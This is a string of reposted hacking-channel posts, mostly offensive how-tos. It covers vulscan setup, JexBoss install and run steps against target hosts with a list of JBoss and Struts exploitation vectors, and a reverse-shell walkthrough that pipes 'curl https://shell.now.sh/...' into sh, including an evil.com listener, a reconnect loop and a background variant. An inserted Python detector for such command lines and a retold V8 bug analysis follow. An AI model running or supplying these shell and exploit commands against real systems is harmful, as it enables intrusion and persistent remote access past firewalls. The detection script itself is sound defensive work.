3) ln -s "$(pwd)/scipag_vulscan" /usr/share/nmap/scripts/vulscan

4) nmap -sV --script=vulscan/vulscan.nse www.example.com

🦑 Single Database Mode
You may execute vulscan with the following argument to use a single database:

--script-args vulscandb=your_own_database
It is also possible to create and reference your own databases. This requires to create a database file, which has the following structure:

<id>;<title>
> Just execute vulscan as you normally would, referring to your database the way you would to one of the pre-delivered ones. Feel free to share your own database and vulnerability connection with me, to add it to the official repository.

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Java Deserialization Vulnerabilities: verification and exploitation tool
> topic tools :
JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and other Java platforms, frameworks and applications.
twitter.com/UndercOdeTC

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„•:

A) Installation on Linux/Mac
To install the latest version of JexBoss, please use the following commands:

1) git clone https://github.com/joaomatosf/jexboss.git

2) cd jexboss

3) pip install -r requires.txt

4) python jexboss.py -h

5) python jexboss.py -host http://target_host:8080

OR:

6) Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip

7) unzip master.zip

8) cd jexboss-master

9) pip install -r requires.txt

10) python jexboss.py -h

11) python jexboss.py -host http://target_host:8080

> If you are using CentOS with Python 2.6, please install Python2.7.

B) Installation example of the Python 2.7 on CentOS using Collections Software scl:

1) yum -y install centos-release-scl

2) yum -y install python27

3) scl enable python27 bash

🦑 Installation on Windows
If you are using Windows, you can use the Git Bash to run the JexBoss. Follow the steps below:

1) Download and install Python

2) Download and install Git for Windows
After installing, run the Git for Windows and type the following commands:
PATH=$PATH:C:\Python27\
PATH=$PATH:C:\Python27\Scripts
3) > git clone https://github.com/joaomatosf/jexboss.git

4) cd jexboss

5) pip install -r requires.txt

6) python jexboss.py -h

7) python jexboss.py -host http://target_host:8080


🦑 The exploitation vectors are:

/admin-console
tested and working in JBoss versions 5 and 6

/jmx-console
tested and working in JBoss versions 4, 5 and 6

/web-console/Invoker
tested and working in JBoss versions 4, 5 and 6

/invoker/JMXInvokerServlet
tested and working in JBoss versions 4, 5 and 6

Application Deserialization
tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters

Servlet Deserialization
tested and working against multiple Java applications, platforms, etc., via servlets that process serialized objects (e.g. when you see an "Invoker" in a link)

Apache Struts2 CVE-2017-5638
tested in Apache Struts 2 applications

🦑 Tested by UndercOde on

> Debian

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Reverse Shell as a Service, topic updated
>pinterest.com/UndercOdeOfficial

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

> git clone https://github.com/lukechilds/reverse-shell
1) Listen for a connection
On your machine, open up a port and listen on it. You can do this easily with netcat.

> nc -l 1337

2) Execute the reverse shell on the target
On the target machine, pipe the output of https://shell.now.sh/yourip:port into sh.

3) curl https://shell.now.sh/192.168.0.69:1337 | sh

4) Go back to your machine; you should now have a shell prompt.

🦑 Hostname

> You can use a hostname instead of an IP.

1) curl https://shell.now.sh/localhost:1337 | sh
Remote connections
Because this is a reverse connection, it can punch through firewalls and connect out to the internet.

2) You could listen for connections on a server at evil.com and get a reverse shell from inside a secure network with:

> curl https://shell.now.sh/evil.com:1337 | sh

3) Reconnecting
By default, when the shell exits you lose your connection. You may do this by accident with an invalid command. You can easily create a shell that will attempt to reconnect by wrapping it in a while loop.

while true; do curl https://shell.now.sh/yourip:1337 | sh; done

4) Running as a background process

> Make sure you run this in a fresh terminal window otherwise you'll lose any work in your existing session.

sh -c "curl https://shell.now.sh/localhost:1337 | sh -i &" && exit

@UndercOdeTesting
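The four variants in this post (plain pipe-to-shell, the reconnect loop, the backgrounded interactive shell, and the netcat listener on the receiving side) all leave a recognisable command line behind, which is what a defender should be matching in shell history or process audit logs. The script below is an added example, not part of the reverse-shell project or this post; the "user host command" log format, the hostnames (RFC 2606 .invalid names and a TEST-NET address) and the sample lines are all constructed.

```python
# Added example, not from the reverse-shell project or the UnderCode post:
# detection logic for the fetch-and-pipe-to-shell pattern and its variants.
# Log format ("user host command") and all sample lines are constructed.
import re

# "curl ... | sh", "wget -O- ... | bash", "... | sh -i"
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash|dash|zsh)\b")
# "while true; do curl ... | sh; done"
RECONNECT_LOOP = re.compile(r"\bwhile\s+true\s*;\s*do\b.*\|\s*(sh|bash)\b.*\bdone\b")
# "| sh -i &" : interactive shell detached into the background
BACKGROUNDED = re.compile(r"\|\s*(sh|bash)\s+-i\s*&")
# "nc -l <port>" : the listening side
LISTENER = re.compile(r"\bnc\b.*\s-l\b")


def classify(cmdline: str) -> list:
    """Return the suspicious traits found in one command line."""
    traits = []
    if PIPE_TO_SHELL.search(cmdline):
        traits.append("pipe_to_shell")
    if RECONNECT_LOOP.search(cmdline):
        traits.append("reconnect_loop")
    if BACKGROUNDED.search(cmdline):
        traits.append("backgrounded_interactive_shell")
    if LISTENER.search(cmdline):
        traits.append("netcat_listener")
    return traits


def scan_log(lines) -> list:
    """lines: 'user host cmd' records; returns (user, host, traits, cmd) for hits."""
    hits = []
    for line in lines:
        parts = line.split(" ", 2)
        if len(parts) < 3:
            continue
        user, host, cmd = parts
        traits = classify(cmd)
        if traits:
            hits.append((user, host, traits, cmd))
    return hits


SAMPLE_LOG = [
    "alice build01 git pull --rebase",
    "svc-web web02 curl https://shell.example.invalid/203.0.113.5:1337 | sh",
    "svc-web web02 while true; do curl https://shell.example.invalid/203.0.113.5:1337 | sh; done",
    "bob dev03 sh -c \"curl https://shell.example.invalid/localhost:1337 | sh -i &\" && exit",
    "bob dev03 curl -sSf https://updates.example.invalid/latest.tar.gz -o latest.tar.gz",
    "carol jump01 nc -l 1337",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The fifth sample line is there on purpose: downloading with curl is routine, and it is the pipe into a shell, not the download, that should raise the alert. Repeated hits from the same host a few seconds apart are the reconnect loop from step 3 seen from the other side.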
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Microsoft finds a Google Chrome vulnerability, Google finds a Microsoft Edge vulnerability: full story by underc0de:
> Security is now a strong differentiator in picking the right browser. We all use browsers for everyday activities, such as staying in touch with loved ones, editing sensitive private and corporate documents, and even managing our financial assets. A single compromise through a web browser can have disastrous consequences. Not to mention that the browser is also becoming one of the most sophisticated pieces of consumer software available, increasing the potential attack surface.
t.me/UndercOdeTesting

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Find and exploit remote vulnerabilities

> Usually, we do this by discovering memory corruption bugs, such as buffer overflows or use-after-free vulnerabilities.

2) As with any web browser, the attack surface is extensive, including the V8 JavaScript interpreter, the Blink DOM engine, and the PDFium PDF renderer. For this project, we focused on V8.

3) The bugs we ultimately used for our exploit were discovered through fuzzing. We used the Azure-based fuzzing infrastructure of the Windows Security Assurance team to run ExprGen, an internal JavaScript fuzzer written by the team behind Chakra (our own JavaScript engine). People have probably thrown every public fuzzer at V8; ExprGen, on the other hand, had only ever been run against Chakra, giving it a better chance of turning up new bugs.

🦑 1) Identifying the bug
One disadvantage of fuzzing compared to manual code review is that it is not always immediately clear what causes a given test case to trigger a vulnerability, or whether the unexpected behavior even constitutes a vulnerability.

2) This is especially true for us at OSR; we don't have any experience working with V8, so we know little about its internals. In this case, the test cases generated by ExprGen reliably crashed V8, but not always in the same way, and not in a way that an attacker could easily control.

3) Since fuzzers often generate very large and complex code (in this case, nearly 1,500 lines of unreadable JavaScript), the first step is usually to minimize the test case, trimming fat until we are left with a small, understandable piece of code. This is underc0de's final conclusion:

> It looks weird and does not really implement anything, but it is valid JavaScript. All it does is create a weirdly structured object and then set some of its fields. This should not trigger any strange behavior, but it does. When running this code with d8, the standalone executable version of V8, built from git tag 6.1.5534.32, we experience a crash.

> Looking at the address where the crash occurred (0x000002d168004f14), we can tell it did not happen in a static module. Therefore, it must be code that was dynamically generated by the V8 Just-In-Time (JIT) compiler. We also see that the crash happens because the rax register is zero.

> This looks like a classic null dereference bug, which would be a disappointment: those are usually not exploitable because modern operating systems prevent the zero virtual address from being mapped.

+ Check out the picture

> Our crash happened right before a function call and looked like a JavaScript function dispatcher stub, mainly because the address of v8::internal::Builtin_FunctionPrototypeToString was loaded into a register before the call. Looking at the code of the function located at 0x000002d167e84500, we find that the address 0x000002d167e8455f does contain a call rbx instruction, which seems to confirm our suspicion.

written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁